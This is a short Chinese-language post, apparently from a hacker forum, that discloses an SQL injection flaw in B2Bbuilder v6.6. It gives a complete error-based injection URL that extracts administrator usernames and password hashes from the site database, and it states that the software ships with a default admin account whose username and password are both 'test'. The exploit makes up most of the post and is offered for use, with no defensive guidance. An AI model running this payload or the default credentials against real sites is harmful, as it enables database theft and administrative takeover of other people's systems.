B2Bbuilder注入漏洞+Exp+默认管理员帐号
博主测试的程序版本为:B2Bbuilder_v6.6注入点点:http://www.unhonker.com/?m=offer&s=offer_list&id=1004
Exp:
http://www.ihonker.org/?m=offer&s=offer_list&id=1004+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1
这个B2B程序还有一个默认的管理员帐号,帐号密码都是test
注:
注入漏洞发现者为:saviour
本博客测试+提供Exp
页:
[1]